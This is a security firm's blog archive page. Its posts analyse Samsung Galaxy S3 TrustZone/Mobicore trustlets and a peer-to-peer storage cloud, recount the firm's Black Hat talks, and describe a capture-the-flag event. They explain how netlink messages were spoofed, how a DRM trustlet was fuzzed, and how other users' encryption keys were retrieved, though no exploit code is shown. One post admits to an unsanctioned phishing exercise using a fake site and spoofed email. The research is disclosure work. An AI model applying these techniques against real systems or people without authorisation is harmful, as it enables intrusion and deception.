Grey bar Blue bar
Share this:

Thu, 6 Jun 2013

A software level analysis of TrustZone OS and Trustlets in Samsung Galaxy Phone

Introduction:


New types of mobile applications based on Trusted Execution Environments (TEE) and most notably ARM TrustZone micro-kernels are emerging which require new types of security assessment tools and techniques. In this blog post we review an example TrustZone application on a Galaxy S3 phone and demonstrate how to capture communication between the Android application and TrustZone OS using an instrumented version of the Mobicore Android library. We also present a security issue in the Mobicore kernel driver that could allow unauthorised communication between low privileged Android processes and Mobicore enabled kernel drivers such as an IPSEC driver.


Mobicore OS :


The Samsung Galaxy S III was the first mobile phone that utilized ARM TrustZone feature to host and run a secure micro-kernel on the application processor. This kernel named Mobicore is isolated from the handset's Android operating system in the CPU design level. Mobicore is a micro-kernel developed by Giesecke & Devrient GmbH (G&D) which uses TrustZone security extension of ARM processors to create a secure program execution and data storage environment which sits next to the rich operating system (Android, Windows , iOS) of the Mobile phone or tablet. The following figure published by G&D demonstrates Mobicore's architecture :

Overview of Mobicore (courtesy of G&D)


A TrustZone enabled processor provides "Hardware level Isolation" of the above "Normal World" (NWd) and "Secure World" (SWd) , meaning that the "Secure World" OS (Mobicore) and programs running on top of it are immune against software attacks from the "Normal World" as well as wide range of hardware attacks on the chip. This forms a "trusted execution environment" (TEE) for security critical application such as digital wallets, electronic IDs, Digital Rights Management and etc. The non-critical part of those applications such as the user interface can run in the "Normal World" operating system while the critical code, private encryption keys and sensitive I/O operations such as "PIN code entry by user" are handled by the "Secure World". By doing so, the application and its sensitive data would be protected against unauthorized access even if the "Normal World" operating system was fully compromised by the attacker, as he wouldn't be able to gain access to the critical part of the application which is running in the secure world.

Mobicore API:


The security critical applications that run inside Mobicore OS are referred to as trustlets and are developed by third-parties such as banks and content providers. The trustlet software development kit includes library files to develop, test and deploy trustlets as well as Android applications that communicate with relevant trustlets via Mobicore API for Android. Trustlets need to be encrypted, digitally signed and then remotely provisioned by G&D on the target mobile phone(s). Mobicore API for Android consists of the following 3 components:


1) Mobicore client library located at /system/lib/libMcClient.so: This is the library file used by Android OS or Dalvik applications to establish communication sessions with trustlets on the secure world


2) Mobicore Daemon located at /system/bin/mcDriverDaemon: This service proxies Mobicore commands and responses between NWd and SWd via Mobicore device driver


3) Mobicore device driver: Registers /dev/mobicore device and performs ARM Secure Monitor Calls (SMC) to switch the context from NWd to SWd


The source code for the above components can be downloaded from Google Code. I enabled the verbose debug messages in the kernel driver and recompiled a Samsung S3 kernel image for the purpose of this analysis. Please note that you need to download the relevant kernel source tree and stock ROM for your S3 phone kernel build number which can be found in "Settings->About device". After compiling the new zImage file, you would need to insert it into a custom ROM and flash your phone. To build the custom ROM I used "Android ROM Kitchen 0.217" which has the option to unpack zImage from the stock ROM, replace it with the newly compiled zImage and pack it again.


By studying the source code of the user API library and observing debug messages from the kernel driver, I figured out the following data flow between the android OS and Mobicore to establish a session and communicate with a trustlet:


1) Android application calls mcOpenDevice() API which cause the Mobicore Daemon (/system/bin/mcDriverDaemon) to open a handle to /dev/mobicore misc device.


2) It then allocates a "Worlds share memory" (WSM) buffer by calling mcMallocWsm() that cause the Mobicore kernel driver to allocate wsm buffer with the requested size and map it to the user space application process. This shared memory buffer would later be used by the android application and trustlet to exchange commands and responses.


3) The mcOpenSession() is called with the UUID of the target trustlet (10 bytes value, for instance : ffffffff000000000003 for PlayReady DRM truslet) and allocate wsm address to establish a session with the target trustlet through the allocated shared memory.


4) Android applications have the option to attach additional memory buffers (up to 6 with maximum size of 1MB each) to the established session by calling mcMap() API. In case of PlayReady DRM trustlet which is used by the Samsung VideoHub application, two additional buffers are attached: one for sending and receiving the parameters and the other for receiving trustlet's text output.


5) The application copies the command and parameter types to the WSM along with the parameter values in second allocated buffer and then calls mcNotify() API to notify the Mobicore that a pending command is waiting in the WSM to be dispatched to the target trustlet.


6) The mcWaitNotification() API is called with the timeout value which blocks until a response received from the trustlet. If the response was not an error, the application can read trustlets' returned data, output text and parameter values from WSM and the two additional mapped buffers.


7) At the end of the session the application calls mcUnMap, mcFreeWsm and mcCloseSession .


The Mobicore kernel driver is the only component in the android operating system that interacts directly with Mobicore OS by use of ARM CPU's SMC instruction and Secure Interrupts . The interrupt number registered by Mobicore kernel driver in Samsung S3 phone is 47 that could be different for other phone or tablet boards. The Mobicore OS uses the same interrupt to notify the kernel driver in android OS when it writes back data.


Analysis of a Mobicore session:


There are currently 5 trustlets pre-loaded on the European S3 phones as listed below:


shell@android:/ # ls /data/app/mcRegistry


00060308060501020000000000000000.tlbin
02010000080300030000000000000000.tlbin
07010000000000000000000000000000.tlbin
ffffffff000000000000000000000003.tlbin
ffffffff000000000000000000000004.tlbin
ffffffff000000000000000000000005.tlbin


The 07010000000000000000000000000000.tlbin is the "Content Management" trustlet which is used by G&D to install/update other trustlets on the target phones. The 00060308060501020000000000000000.tlbin and ffffffff000000000000000000000003.tlbin are DRM related truslets developed by Discretix. I chose to analyze PlayReady DRM trustlet (ffffffff000000000000000000000003.tlbin), as it was used by the Samsung videohub application which is pre-loaded on the European S3 phones.


The videohub application dose not directly communicate with PlayReady trustlet. Instead, the Android DRM manager loads several DRM plugins including libdxdrmframeworkplugin.so which is dependent on libDxDrmServer.so library that makes Mobicore API calls. Both of these libraries are closed source and I had to perform dynamic analysis to monitor communication between libDxDrmServer.so and PlayReady trustlet. For this purpose, I could install API hooks in android DRM manager process (drmserver) and record the parameter values passed to Mobicore user library (/system/lib/libMcClient.so) by setting LD_PRELOAD environment variable in the init.rc script and flash my phone with the new ROM. I found this approach unnecessary, as the source code for Mobicore user library was available and I could add simple instrumentation code to it which saves API calls and related world shared memory buffers to a log file. In order to compile such modified Mobicore library, you would need to the place it under the Android source code tree on a 64 bit machine (Android 4.1.1 requires 64 bit machine to compile) with 30 GB disk space. To save you from this trouble, you can download a copy of my Mobicore user library from here. You need to create the empty log file at /data/local/tmp/log and replace this instrumented library with the original file (DO NOT FORGET TO BACKUP THE ORIGINAL FILE). If you reboot the phone, the Mobicore session between Android's DRM server and PlayReady trustlet will be logged into /data/local/tmp/log. A sample of such session log is shown below:



The content and address of the shared world memory and two additional mapped buffers are recorded in the above file. The command/response format in wsm buffer is very similar to APDU communication in smart card applications and this is not a surprise, as G&D has a long history in smart card technology. The next step is to interpret the command/response data, so that we can manipulate them later and observe the trustlet behavior. The trustlet's output in text format together with inspecting the assembly code of libDxDrmServer.so helped me to figure out the PlayReady trustlet command and response format as follows:


client command (wsm) : 08022000b420030000000001000000002500000028023000300000000500000000000000000000000000b0720000000000000000


client parameters (mapped buffer 1): 8f248d7e3f97ee551b9d3b0504ae535e45e99593efecd6175e15f7bdfd3f5012e603d6459066cc5c602cf3c9bf0f705b


trustlet response (wsm):08022000b420030000000081000000002500000028023000300000000500000000000000000000000000b0720000000000000000


trustltlet text output (mapped buffer 2):


==================================================


SRVXInvokeCommand command 1000000 hSession=320b4


SRVXInvokeCommand. command = 0x1000000 nParamTypes=0x25


SERVICE_DRM_BBX_SetKeyToOemContext - pPrdyServiceGlobalContext is 32074


SERVICE_DRM_BBX_SetKeyToOemContext cbKey=48


SERVICE_DRM_BBX_SetKeyToOemContext type=5


SERVICE_DRM_BBX_SetKeyToOemContext iExpectedSize match real size=48


SERVICE_DRM_BBX_SetKeyToOemContext preparing local buffer DxDecryptAsset start - iDatatLen=32, pszInData=0x4ddf4 pszIntegrity=0x4dde4


DxDecryptAsset calling Oem_Aes_SetKey DxDecryptAsset


calling DRM_Aes_CtrProcessData DxDecryptAsset


calling DRM_HMAC_CreateMAC iDatatLen=32 DxDecryptAsset


after calling DRM_HMAC_CreateMAC DxDecryptAsset


END SERVICE_DRM_BBX_SetKeyToOemContext


calling DRM_BBX_SetKeyToOemContext


SRVXInvokeCommand.id=0x1000000 res=0x0


==============================================


By mapping the information disclosed in the trustlet text output to the client command the following format was derived:


08022000 : virtual memory address of the text output buffer in the secure world (little endian format of 0x200208)


b4200300 : PlayReady session ID


00000001: Command ID (0x1000000)


00000000: Error code (0x0 = no error, is set by truslet after mcWaitNotification)


25000000: Parameter type (0x25)


28023000: virtual memory address of the parameters buffer in the secure world (little endian format of 0x300228)


30000000: Parameters length in bytes (0x30, encrypted key length)


05000000: encryption key type (0x5)


The trustlet receives client supplied memory addresses as input data which could be manipulated by an attacker. We'll test this attack later. The captured PlayReady session involved 18 command/response pairs that correspond to the following high level diagram of PlayReady DRM algorithm published by G&D. I couldn't find more detailed specification of the PlayReady DRM on the MSDN or other web sites. But at this stage, I was not interested in the implementation details of the PlayReady schema, as I didn't want to attack the DRM itself, but wanted to find any exploitable issue such as a buffer overflow or memory disclosure in the trustlet.

DRM Trustlet diagram (courtesy of G&D)


Security Tests:


I started by auditing the Mobicore daemon and kernel driver source code in order to find issues that can be exploited by an android application to attack other applications or result in code execution in the Android kernel space. I find one issue in the Mobicore kernel API which is designed to provide Mobicore services to other Android kernel components such as an IPSEC driver. The Mobicore driver registers Linux netLink server with id=17 which was intended to be called from the kernel space, however a Linux user space process can create a spoofed message using NETLINK sockets and send it to the Mobicore kernel driver netlink listener which as shown in the following figure did not check the PID of the calling process and as a result, any Android app could call Mobicore APIs with spoofed session IDs. The vulnerable code snippet from MobiCoreKernelApi/main.c is included below.



An attacker would need to know the "sequence number" of an already established netlink connection between a kernel component such as IPSEC and Mobicore driver in order to exploit this vulnerability. This sequence numbers were incremental starting from zero but currently there is no kernel component on the Samsung phone that uses the Mobicore API, thus this issue was not a high risk. We notified the vendor about this issue 6 months ago but haven't received any response regarding the planned fix. The following figures demonstrate exploitation of this issue from an Android unprivileged process :

Netlink message (seq=1) sent to Mobicore kernel driver from a low privileged process


Unauthorised netlink message being processed by the Mobicore kernel driver


In the next phase of my tests, I focused on fuzzing the PlayReady DRM trustlet that mentioned in the previous section by writing simple C programs which were linked with libMcClient.so and manipulating the DWORD values such as shared buffer virtual address. The following table summarises the results:
wsm offsetDescriptionResults
0Memory address of the mapped output buffer in trustlet process (original value=0x08022000)for values<0x8022000 the fuzzer crashed


values >0x8022000 no errors

41memory address of the parameter mapped buffer in trusltet process (original value=0x28023000)0x00001000<value<0x28023000 the fuzzer crashed


value>=00001000 trustlet exits with "parameter refers to secure memory area"


value>0x28023000 no errors

49Parameter length (encryption key or certificate file length)For large numbers the trustlet exits with "malloc() failed" message

The fuzzer crash indicated that Mobicore micro-kernel writes memory addresses in the normal world beyond the shared memory buffer which was not a critical security issue, because it means that fuzzer can only attack itself and not other processes. The "parameter refers to secure memory area" message suggests that there is some sort of input validation implemented in the Mobicore OS or DRM trustlet that prevents normal world's access to mapped addresses other than shared buffers. I haven't yet run fuzzing on the parameter values itself such as manipulating PlayReady XML data elements sent from the client to the trustlet. However, there might be vulnerabilities in the PlayReady implementation that can be picked up by smarter fuzzing.


Conclusion:


We demonstrated that intercepting and manipulating the worlds share memory (WSM) data can be used to gain better knowledge about the internal workings of Mobicore trustlets. We believe that this method can be combined with the side channel measurements to perform blackbox security assessment of the mobile TEE applications. The context switching and memory sharing between normal and secure world could be subjected to side channel attacks in specific cases and we are focusing our future research on this area.

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.


The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...


We never presented at Black Hat USA in 2012, although we did do some very cool work in that year.


For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.


See you in Vegas!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centers as well as operational and maintenance costs. An alternative approach is based on distributed computing model which utilizes portion of the storage and processing resources of consumer level computers and SME NAS devices to form a peer to peer storage system. The members contribute some of their local storage space to the system and in return receive "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such de-centerlized storage system is a big challenge to be addressed. As the cost of data storage devices declines, there is a debate that whether the P2P storage could really be cost saving or not. I leave this debate to the critics and instead I will look into a peer to peer storage system and study its security measures and possible issues. An overview of this system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. File synchronisation and contribution agents that are running on every node interact with the cloud control server and other nodes as shown in the above picture. Folder/File synchronisation is performed in the following steps:



1) The node authenticates itself to the control server and sends file upload request with file meta data including SHA1 hash value, size, number of fragments and file name over HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, a [IP Address]:[Port number] list of contributing nodes called "endpoints list" and a file ID.


3) The file is split into blocks each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments and redundancy information also gets added to them.


4) The node then connects to the contribution agent on each endpoint address that was received in step 2 and uploads one fragment to each of them


Since the system nodes are not under full control of the control server, they fall offline any time or the stored file fragments may become damaged/modified intentionally. As such, the control server needs to monitor node and fragment health regularly so that it may move lost/damaged fragments to alternate nodes if need be. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server on which it receives the following "tasks":


a) Adjust settings : instructs the node to modify its upload/download limits , contribution size and etc


b) Block check : asks the node to connect to another contribution node and verify a fragment existence and hash value


c) Block Recovery : Assist the control server to recover a number of fragments


By delegating the above task, the control system has placed some degree of "trust" or at least "assumptions" about the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control - one of which was acting as a contribution node. I didn't include the analysis of the encryption or redundancy of the system in my preliminary research because it could affect the live system and should only be performed on a test environment which was not possible to set up, as the target system's control server was not publicly available. Within the contribution agent alone, I identified that not only did I have unauthorised access file storage (and download) on the cloud's nodes, but I had unauthorised access to the folder encryption keys as well.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(s) with the control server and other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with similar format to the above path name resulted in the "bad request" error from the agent. This indicated that the fragment name should be related to its content and this condition is checked by the contribution agent before accepting the PUT request. By decompiling the agent software code, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>


I used the above file fragment format to upload notepad.exe to the remote node successfully as you can see in the following figure:



The download request (GET request) was also successful regardless of the validity of "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because it won't receive any "Block Check" requests for the control server for this fragment. Twenty four hours still is enough time for malicious users to abuse storage cloud nodes bandwidth and storage to serve their contents over the internet without victim's knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node as mentioned above. This was intended to serve "Block Check" commands from the control server which instructs a node to fetch a number of fragments from other nodes (referred to as "endpoints") and verify their integrity but re-calculating the SHA1 hash and reporting back to the control server. This could be part of the cloud "health check" process to ensure that the distributed file fragments are accessible and not tampered with. The agent could also process "File Recovery" tasks from the control server but I didn't observe any such command from the control server during the dynamic analysis of the contribution agent, so I searched the decompiled code for clues on the file recovery process and found the following code snippet which could suggest that the agent is cable of retrieving encryption keys from the control server. This was something odd, considering that each node should only have access to its own folders encryption keys and it stores encrypted file fragments of other nodes.


One possible explanation for the above file recovery code, could be that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server in order to decrypt and re-assemble its own files. In order to test if it's possible to abuse the file recovery operation to gain access to encryption key of the folders belonging to other nodes. I extracted the folderInfo request format from the agent code and set up another storage node as a target to test this idea. The result of the test was successful as shown in the following figure and it was possible to retrieve the AES-256 encryption key for the Folder Id "1099869693336". This could enable an attacker who has set up an contributing storage node to decrypt the fragments that belong to other cloud users.



Conclusion:


While peer to peer storage systems have lower setup/maintenance costs, they face security threats from the storage nodes that are not under direct physical/remote control of the cloud controller system. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation control, as demonstrated in this post. While analysis of the data encryption and redundancy in the peer to peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Thu, 14 Feb 2013

Adolescence: 13 years of SensePost

Today was our 13th birthday. In Internet years, that's a long time. Depending on your outlook, we're either almost a pensioner or just started our troublesome teens. We'd like to think it's somewhere in the middle. The Internet has changed lots from when SensePost was first started on the 14th February 2000. Our first year saw the infamous ILOVEYOU worm wreak havoc across the net, and we learned some, lessons on vulnerability disclosure, a year later we moved on to papers about "SQL insertion" and advanced trojans. And the research continues today.


We've published a few tools along the way, presented some (we think) cool ideas and were lucky enough to have spent the past decade training thousands of people in the art of hacking. Most importantly, we made some great friends in this community of ours. It has been a cool adventure, and indeed still very much is, for everyone who's has the pleasure of calling themselves a Plak'er. Ex-plakkers have gone on to do more great things and branch out into new spaces. Current Plakkers are still doing cool things too!


But reminiscing isn't complete without some pictures to remind you just how much hair some people had, and just how little some people's work habit's have changed. Not to mention the now questionable fashion.



Fast forward thirteen years, the offices are fancier and the plakkers have become easier on the eye, but the hacking is still as sweet.



As we move into our teenage years (or statesman ship depending on your view), we aren't standing still or slowing down. The team has grown; we now have ten different nationalities in the team, are capable of having a conversation in over 15 languages, and have developed incredible foos ball skills.


This week, we marked another special occasion for us at SensePost: the opening of our first London office in the trendy Hackney area (it has "hack" in it, and is down the road from Google, fancy eh?). We've been operating in the UK for some time, but decided to put down some roots with our growing clan this side of the pond.



And we still love our clients, they made us who we are, and still do. Last month alone, the team was in eight different countries doing what they do best.


But with all the change we are still the same SensePost at heart. Thank you for reminiscing with us on our birthday. Here's to another thirteen years of hacking stuff, having fun and making friends.

Tue, 11 Dec 2012

CSIR Cyber Games

The Council for Scientific and Industrial Research (CSIR) recently hosted the nation Cyber Games Challenge as part of Cyber Security Awareness month. The challenge pit teams of 4-5 members from different institutes against each other in a Capture the Flag style contest. In total there were seven teams, with two teams from Rhodes university, two from the University of Pretoria and three teams from the CSIR.


The games were designed around an attack/defence scenario, where teams would be given identical infrastructure which they could then patch against vulnerabilities and at the same time identify possible attack vectors to use against rival teams. After the initial reconnaissance phase teams were expected to conduct a basic forensic investigation to find 'flags' hidden throughout their systems. These 'flags' were hidden in images, pcap files, alternative data streams and in plain sight.


It was planned that teams would then be given access to a few web servers to attack and deface, gain root, patch and do other fun things to. Once this phase was complete the system would be opened up and the 'free-for-all' phase would see teams attacking each others systems. Teams would lose points for each service that was rendered inaccessible. Unfortunately due to technical difficulties the competition did not go as smoothly as initially planned. Once the games started the main website was rendered unusable almost immediately due to teams DirBuster to enumerate the competition scoring system. The offending teams were asked to cease their actions and the games proceeding from there. Two teams were disqualified after not ceasing their attacks on official infrastructure. Once teams tried to access their virtual infrastructure new problems arose, with only the two teams from Rhodes being able to access the ESX server while the rest of the teams based at the CSIR had no connectivity. This was rectified, at a cost, resulting in all teams except for the two Rhodes teams having access to their infrastructure. After a few hours of struggle it was decided to scrap the attack/defence part of the challenge. Teams were awarded points for finding hidden flags, with the most basic flag involving 'decoding' a morse-code pattern or a phrase 'encrypted' using a quadratic equation. It was unfortunate that the virtual infrastructure did not work as planned as this was to be the main focus of the games and sadly without it many teams were left with very little to do in the time between new 'flag' challenges being released.


In the days prior to the challenge our team, team Blitzkrieg, decided to conduct a social engineering exercise. We expected this to add to the spirit of the games and to introduce a little friendly rivalry between the teams prior to the games commencing. A quick google search for "CSIR Cyber Games" revealed a misconfigured cyber games server that had been left exposed on a public interface. Scrapping this page for information allowed us to create a fake Cyber Games site. A fake Twitter account was created on behalf of the CSIR Cyber Games organisers and used to tweet little titbits of disinformation. Once we had set-up our fake site and twitter account, a spoofed email in the name of the games organiser was sent out to all the team captains. Teams were invited to follow our fake user on twitter and to register on our cyber games page. Unfortunately this exercise did not go down too well with the games organisers and our team was threatened with disqualification or starting the games on negative points. In hindsight we should have run this by the organisers first to insure that it was within scope. After the incident we engaged with the organisers to explain our position and intentions, they were very understanding and decided to not disqualify us and waver any point based penalty. As part of our apology, we agreed to submit a few challenges for next years Cyber Games.


Overall we believe concept of using structured Cyber Games to promote security awareness is both fun and useful. While the games were hampered by network issues there was enough content available to make for an entertaining and exciting afternoon. The rush of solving challenges as fast as possible and everyone communicating ideas made for an epic day. In closing, the CSIR Cyber Games was a success, as with all things we believe it will improve over time and provide a good platform to promote security awareness.


For the defacement phase of the games we made a old school defacement page.